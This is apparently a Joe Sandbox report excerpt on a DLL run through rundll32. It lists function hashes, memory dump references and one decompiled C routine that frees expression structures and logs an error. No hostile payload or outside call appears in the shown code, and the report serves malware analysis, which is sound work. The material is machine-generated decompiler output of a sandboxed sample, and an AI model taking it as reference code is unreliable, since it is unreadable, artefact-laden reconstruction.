Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cdd2940973defb10da75f7d0a0d281f42e3bf5b71a3b14d95178fa4bbb93f91a
Instruction ID: cfe0db77eb5cf6d1d758d10ab8d8d19e39a375eed658ea468c837abfea5f450e
Opcode Fuzzy Hash: cdd2940973defb10da75f7d0a0d281f42e3bf5b71a3b14d95178fa4bbb93f91a
Instruction Fuzzy Hash: C6D124729083698BC790CE28C88176A77D2EF85310F3A89BDDC95CF346E635E844DB95

Uniqueness

Uniqueness Score: -1.00%

Function 10008144 Relevance: .2, Instructions: 248COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0fdca86bf5610cf8d83fc9a2a9123c7de6589e9a7e00ce3a8cca6f1a48dd3632
Instruction ID: 8c294614796abfce7a9b313687c0130c20c351539878b9b69ed8c38673feebb7
Opcode Fuzzy Hash: 0fdca86bf5610cf8d83fc9a2a9123c7de6589e9a7e00ce3a8cca6f1a48dd3632
Instruction Fuzzy Hash: 2DA134356002118FD398DE1FD8D0D6A7393ABC432DF5BC26E9E445B3AACD38B4669790

Uniqueness

Uniqueness Score: -1.00%

Function 1002A800 Relevance: .2, Instructions: 223COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb23b611c883a24b7dc64f5ed3ae72e36c28d5f49227ddd76db04b40012c1942
Instruction ID: 5a3567ab1930261374c9840a1c83134747ca7f3c34ec4ff9dc62d8c6c08ad054
Opcode Fuzzy Hash: fb23b611c883a24b7dc64f5ed3ae72e36c28d5f49227ddd76db04b40012c1942
Instruction Fuzzy Hash: 59815172B047019FD308CF19D58161AF7E7ABD8210F5AC43DA999CB3A5DA74E841CB81

Uniqueness

Uniqueness Score: -1.00%

Function 1000E760 Relevance: .2, Instructions: 174COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7460696957a74314385251e6c6bcc12f45c6b26b427e07c74903d9ed9e685e2
Instruction ID: a9fd71970cc6ae0704401159e34ccb1fdaf457640d2c7af12330d1c819c8daf0
Opcode Fuzzy Hash: f7460696957a74314385251e6c6bcc12f45c6b26b427e07c74903d9ed9e685e2
Instruction Fuzzy Hash: 8941B173F2582507E7188828CC05319B2C3DBE4271B1EC37AED59EB789E934ED1686C2

Uniqueness

Uniqueness Score: -1.00%

Function 1000164B Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b52556cb5978d76f0a161bfc99e885d281cec0efd41f06b8f83135470bebe30
Instruction ID: 873dc1b037270df3c72fc734cdf9910190291773d7bcced776bb32a5dc4e00db
Opcode Fuzzy Hash: 4b52556cb5978d76f0a161bfc99e885d281cec0efd41f06b8f83135470bebe30
Instruction Fuzzy Hash: 3081E2745042528FDB94CF29C5C0A96BBE1FF9E310F59C4B9ED988F61AE230A941DF60

Uniqueness

Uniqueness Score: -1.00%

Function 10024280 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21e1bf70edc85c72b57ecd771a589712a2623989afca4d70576e69868d5c536e
Instruction ID: d243654ff977fd15b0e0421b28be889c9be6cd6a9a899c254bf598e7771c2fe2
Opcode Fuzzy Hash: 21e1bf70edc85c72b57ecd771a589712a2623989afca4d70576e69868d5c536e
Instruction Fuzzy Hash: 0A4174627043329AE314ABEDF4C045EF2E1FE81BA1B874A69D2952F141D230D84DC7EB

Uniqueness

Uniqueness Score: -1.00%

Function 1000D060 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01961a118ebc83994ce737a496e9055b1f8ab46d9bbd015c8cfe35346e32c7fc
Instruction ID: 6d93bd8323a72235920ba6e149a4a7bae96c73b66a2dfad555009d0c6ff0ce4f
Opcode Fuzzy Hash: 01961a118ebc83994ce737a496e9055b1f8ab46d9bbd015c8cfe35346e32c7fc
Instruction Fuzzy Hash: 5311D2B3F2453203E71CD4199C2136D828387E82B071FC23FDE47A7286EC609D5682D1

Uniqueness

Uniqueness Score: -1.00%

Function 1000C0B0 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de151643a332339ce823666c471d4da1aa7b144928b0c7d3fd1e004a2c822b77
Instruction ID: 192b5b8e635135c3962563ef613f7b52fce4010c0b042699b34e9086fceffb22
Opcode Fuzzy Hash: de151643a332339ce823666c471d4da1aa7b144928b0c7d3fd1e004a2c822b77
Instruction Fuzzy Hash: 38316F651087D85ECB11CF3544904EABFE09EAB581B09C49EF8E84B247C524EB09EB71

Uniqueness

Uniqueness Score: -1.00%

Function 100101D0 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c78873d4f70a7114040ce7729ab5ab63925d14f9cd724e7e38f810f9ad5a330b
Instruction ID: 7615e6e647f5862a10f08712ea71b14590be4302af2179b17c0dfb1654340f57
Opcode Fuzzy Hash: c78873d4f70a7114040ce7729ab5ab63925d14f9cd724e7e38f810f9ad5a330b
Instruction Fuzzy Hash: FF2122726042658BCB14DE19C8D86AB73E2FBC9314F168A68E9C55F205C234F84ACBD1

Uniqueness

Uniqueness Score: -1.00%

Function 1001E0D9 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c76c69a6e16dc7822b4f5a1a757f8ccc5bafd5d8a12991ea2ea248d2ead5663
Instruction ID: 69aa92c53cb6c6df6d72f2decc3ec4bd7719b31d68b56e1e2cf303e831d432a8
Opcode Fuzzy Hash: 0c76c69a6e16dc7822b4f5a1a757f8ccc5bafd5d8a12991ea2ea248d2ead5663
Instruction Fuzzy Hash: 9421BF71A08189EFCB68CF98C8A1A9DBBF5EB09314F244095E905AF751D330EDC1EB55

Uniqueness

Uniqueness Score: -1.00%

Function 1001021B Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 123d4edf2cae72c4cb44158153aca10c35860e83f93e9ec1453424ef70596d6d
Instruction ID: bcaa8491dccb865917a35a3d808823525e0e43ff59a73624eea8fea794acadd0
Opcode Fuzzy Hash: 123d4edf2cae72c4cb44158153aca10c35860e83f93e9ec1453424ef70596d6d
Instruction Fuzzy Hash: 141134326041618BCB15CE69C8D86AA73D2FBC9315F17C968E9C69F245C334F94ACBD0

Uniqueness

Uniqueness Score: -1.00%

Function 1000C1B0 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca7d7dad83a973bb790b37e6832e95b579524e0ac113e1f4aa988c8562b958bd
Instruction ID: f8771a243a862af8759e5689c7b57640d36b1020b076dab7645bd5d8fe9118fc
Opcode Fuzzy Hash: ca7d7dad83a973bb790b37e6832e95b579524e0ac113e1f4aa988c8562b958bd
Instruction Fuzzy Hash: BDF0F676B1435947E900DF459C40B8BB7D9FFC42D8F16052EED48A3305C630BD0586A1

Uniqueness

Uniqueness Score: -1.00%

Function 10017162 Relevance: 100.1, APIs: 56, Strings: 1, Instructions: 337COMMON

Download Yara Rule

APIs

mv_mallocz.F072 ref: 10017236

Strings

Invalid chars '%s' at the end of expression '%s', xrefs: 1001726C

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_mallocz
String ID: Invalid chars '%s' at the end of expression '%s'
API String ID: 1901900789-1422635149
Opcode ID: d35623eb4b68d314ae0af4ba429531c6b924d290049fd1e943cfdb02dea8e5ab
Instruction ID: c3773f839444201a897c0eab6702ce5d2794ca60865343955b286594f26e5f05
Opcode Fuzzy Hash: d35623eb4b68d314ae0af4ba429531c6b924d290049fd1e943cfdb02dea8e5ab
Instruction Fuzzy Hash: E1E182B89097459FC780DFA8D08191ABBF1FF88290F95586DF8C58B312D735E881CB92

Uniqueness

Uniqueness Score: -1.00%

Function 10017261 Relevance: 98.3, APIs: 55, Strings: 1, Instructions: 270
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E10017261(void* __eax, void* __ebx, void* __edi, intOrPtr __esi, char _a4, char* _a8, char* _a12, intOrPtr _a16, char _a48, char* _a52, char _a56, char _a60) {
				intOrPtr _t116;
				void* _t118;
				intOrPtr* _t120;

				_t116 = __esi;
				_a12 = __eax;
				__eax = "Invalid chars \'%s\' at the end of expression \'%s\'\n";
				__edx = 0x10;
				_a8 = "Invalid chars \'%s\' at the end of expression \'%s\'\n";
				__eax =  &_a60;
				_a16 = __ebx;
				_a4 = 0x10;
				 *__esp =  &_a60;
				__eax = E10026560();
				_a48 = __edi;
				if(__edi != 0) {
					__eax =  *(__edi + 0x18);
					_a52 = __eax;
					if(__eax != 0) {
						__edx = __eax[0x18];
						_a56 = __edx;
						if(__edx != 0) {
							 *((intOrPtr*)(__edx + 0x18)) = E10015280( *((intOrPtr*)(__edx + 0x18)));
							_a56 =  *(_a56 + 0x1c);
							__eax = E10015280( *(_a56 + 0x1c));
							_a56 =  *(_a56 + 0x20);
							E10015280( *(_a56 + 0x20)) = _a56;
							__eax = _a56 + 0x24;
							E100290E0(_a56 + 0x24);
							__eax =  &_a56;
							E100290E0( &_a56);
							__eax = _a52;
						}
						__edx = __eax[0x1c];
						_a56 = __edx;
						if(__edx != 0) {
							 *((intOrPtr*)(__edx + 0x18)) = E10015280( *((intOrPtr*)(__edx + 0x18)));
							_a56 =  *(_a56 + 0x1c);
							__eax = E10015280( *(_a56 + 0x1c));
							_a56 =  *(_a56 + 0x20);
							E10015280( *(_a56 + 0x20)) = _a56;
							__eax = _a56 + 0x24;
							E100290E0(_a56 + 0x24);
							__eax =  &_a56;
							E100290E0( &_a56);
							__eax = _a52;
						}
						__edx = __eax[0x20];
						_a56 = __edx;
						if(__edx != 0) {
							 *((intOrPtr*)(__edx + 0x18)) = E10015280( *((intOrPtr*)(__edx + 0x18)));
							_a56 =  *(_a56 + 0x1c);
							__eax = E10015280( *(_a56 + 0x1c));
							_a56 =  *(_a56 + 0x20);
							E10015280( *(_a56 + 0x20)) = _a56;
							__eax = _a56 + 0x24;
							E100290E0(_a56 + 0x24);
							__eax =  &_a56;
							E100290E0( &_a56);
							__eax = _a52;
						}
						E100290E0(__eax);
						__eax =  &_a52;
						E100290E0( &_a52);
						__edi = _a48;
					}
					__eax =  *(__edi + 0x1c);
					_a52 = __eax;
					if(__eax == 0) {
						L22:
						__eax =  *(__edi + 0x20);
						_a52 = __eax;
						if(__eax == 0) {
							L30:
							E100290E0(__edi);
							__eax =  &_a48;
							E100290E0( &_a48);
							goto L1;
						}
						__edx = __eax[0x18];
						_a56 = __edx;
						if(__edx != 0) {
							 *((intOrPtr*)(__edx + 0x18)) = E10015280( *((intOrPtr*)(__edx + 0x18)));
							_a56 =  *(_a56 + 0x1c);
							__eax = E10015280( *(_a56 + 0x1c));
							_a56 =  *(_a56 + 0x20);
							E10015280( *(_a56 + 0x20)) = _a56;
							__eax = _a56 + 0x24;
							E100290E0(_a56 + 0x24);
							__eax =  &_a56;
							E100290E0( &_a56);
							__eax = _a52;
						}
						__edx = __eax[0x1c];
						_a56 = __edx;
						if(__edx != 0) {
							 *((intOrPtr*)(__edx + 0x18)) = E10015280( *((intOrPtr*)(__edx + 0x18)));
							_a56 =  *(_a56 + 0x1c);
							__eax = E10015280( *(_a56 + 0x1c));
							_a56 =  *(_a56 + 0x20);
							E10015280( *(_a56 + 0x20)) = _a56;
							__eax = _a56 + 0x24;
							E100290E0(_a56 + 0x24);
							__eax =  &_a56;
							E100290E0( &_a56);
							__eax = _a52;
						}
						__edx = __eax[0x20];
						_a56 = __edx;
						if(__edx != 0) {
							 *((intOrPtr*)(__edx + 0x18)) = E10015280( *((intOrPtr*)(__edx + 0x18)));
							_a56 =  *(_a56 + 0x1c);
							__eax = E10015280( *(_a56 + 0x1c));
							_a56 =  *(_a56 + 0x20);
							E10015280( *(_a56 + 0x20)) = _a56;
							__eax = _a56 + 0x24;
							E100290E0(_a56 + 0x24);
							__eax =  &_a56;
							E100290E0( &_a56);
							__eax = _a52;
						}
						E100290E0(__eax);
						__eax =  &_a52;
						E100290E0( &_a52);
						__edi = _a48;
						goto L30;
					} else {
						__edx = __eax[0x18];
						_a56 = __edx;
						if(__edx != 0) {
							 *((intOrPtr*)(__edx + 0x18)) = E10015280( *((intOrPtr*)(__edx + 0x18)));
							_a56 =  *(_a56 + 0x1c);
							__eax = E10015280( *(_a56 + 0x1c));
							_a56 =  *(_a56 + 0x20);
							E10015280( *(_a56 + 0x20)) = _a56;
							__eax = _a56 + 0x24;
							E100290E0(_a56 + 0x24);
							__eax =  &_a56;
							E100290E0( &_a56);
							__eax = _a52;
						}
						__edx = __eax[0x1c];
						_a56 = __edx;
						if(__edx != 0) {
							 *((intOrPtr*)(__edx + 0x18)) = E10015280( *((intOrPtr*)(__edx + 0x18)));
							_a56 =  *(_a56 + 0x1c);
							__eax = E10015280( *(_a56 + 0x1c));
							_a56 =  *(_a56 + 0x20);
							E10015280( *(_a56 + 0x20)) = _a56;
							__eax = _a56 + 0x24;
							E100290E0(_a56 + 0x24);
							__eax =  &_a56;
							E100290E0( &_a56);
							__eax = _a52;
						}
						__edx = __eax[0x20];
						_a56 = __edx;
						if(__edx != 0) {
							 *((intOrPtr*)(__edx + 0x18)) = E10015280( *((intOrPtr*)(__edx + 0x18)));
							_a56 =  *(_a56 + 0x1c);
							__eax = E10015280( *(_a56 + 0x1c));
							_a56 =  *(_a56 + 0x20);
							E10015280( *(_a56 + 0x20)) = _a56;
							__eax = _a56 + 0x24;
							E100290E0(_a56 + 0x24);
							__eax =  &_a56;
							E100290E0( &_a56);
							__eax = _a52;
						}
						E100290E0(__eax);
						__eax =  &_a52;
						E100290E0( &_a52);
						__edi = _a48;
						goto L22;
					}
				}
				L1:
				 *_t120 = _t116;
				L100290D0();
				return _t118;
			}

0x10017261
0x10017268
0x1001726c
0x10017271
0x10017276
0x1001727a
0x1001727e
0x10017282
0x10017286
0x10017289
0x10017293
0x10017299
0x1001729b
0x1001729e
0x100172a4
0x100172aa
0x100172ad
0x100172b3
0x100172bb
0x100172c4
0x100172ca
0x100172d3
0x100172de
0x100172e2
0x100172e8
0x100172ed
0x100172f4
0x100172f9
0x100172f9
0x100172fd
0x10017300
0x10017306
0x1001730e
0x10017317
0x1001731d
0x10017326
0x10017331
0x10017335
0x1001733b
0x10017340
0x10017347
0x1001734c
0x1001734c
0x10017350
0x10017353
0x10017359
0x10017361
0x1001736a
0x10017370
0x10017379
0x10017384
0x10017388
0x1001738e
0x10017393
0x1001739a
0x1001739f
0x1001739f
0x100173a9
0x100173ae
0x100173b5
0x100173ba
0x100173ba
0x100173be
0x100173c1
0x100173c7
0x100174e1
0x100174e1
0x100174e4
0x100174ea
0x10017604
0x1001760a
0x1001760f
0x10017616
0x00000000
0x10017616
0x100174f0
0x100174f3
0x100174f9
0x10017501
0x1001750a
0x10017510
0x10017519
0x10017524
0x10017528
0x1001752e
0x10017533
0x1001753a
0x1001753f
0x1001753f
0x10017543
0x10017546
0x1001754c
0x10017554
0x1001755d
0x10017563
0x1001756c
0x10017577
0x1001757b
0x10017581
0x10017586
0x1001758d
0x10017592
0x10017592
0x10017596
0x10017599
0x1001759f
0x100175a7
0x100175b0
0x100175b6
0x100175bf
0x100175ca
0x100175ce
0x100175d4
0x100175d9
0x100175e0
0x100175e5
0x100175e5
0x100175ef
0x100175f4
0x100175fb
0x10017600
0x00000000
0x100173cd
0x100173cd
0x100173d0
0x100173d6
0x100173de
0x100173e7
0x100173ed
0x100173f6
0x10017401
0x10017405
0x1001740b
0x10017410
0x10017417
0x1001741c
0x1001741c
0x10017420
0x10017423
0x10017429
0x10017431
0x1001743a
0x10017440
0x10017449
0x10017454
0x10017458
0x1001745e
0x10017463
0x1001746a
0x1001746f
0x1001746f
0x10017473
0x10017476
0x1001747c
0x10017484
0x1001748d
0x10017493
0x1001749c
0x100174a7
0x100174ab
0x100174b1
0x100174b6
0x100174bd
0x100174c2
0x100174c2
0x100174cc
0x100174d1
0x100174d8
0x100174dd
0x00000000
0x100174dd
0x100173c7
0x1001724f
0x1001724f
0x10017252
0x10017260

APIs

mv_log.F072 ref: 10017289
mv_freep.F072 ref: 100172E8
mv_freep.F072 ref: 100172F4
mv_expr_free.F072 ref: 100172D9

Part of subcall function 10015280: mv_freep.F072 ref: 10015588
Part of subcall function 10015280: mv_freep.F072 ref: 10015594
Part of subcall function 10015280: mv_freep.F072 ref: 100155DB
Part of subcall function 10015280: mv_freep.F072 ref: 100155E7
Part of subcall function 10015280: mv_freep.F072 ref: 100155F6
Part of subcall function 10015280: mv_freep.F072 ref: 10015602
Part of subcall function 10015280: mv_freep.F072 ref: 10015667
Part of subcall function 10015280: mv_freep.F072 ref: 10015673
Part of subcall function 10015280: mv_freep.F072 ref: 100156BA

mv_expr_free.F072 ref: 100172CA

Part of subcall function 10015280: mv_freep.F072 ref: 1001542C
Part of subcall function 10015280: mv_freep.F072 ref: 10015438
Part of subcall function 10015280: mv_freep.F072 ref: 10015447
Part of subcall function 10015280: mv_freep.F072 ref: 10015453
Part of subcall function 10015280: mv_freep.F072 ref: 1001549A
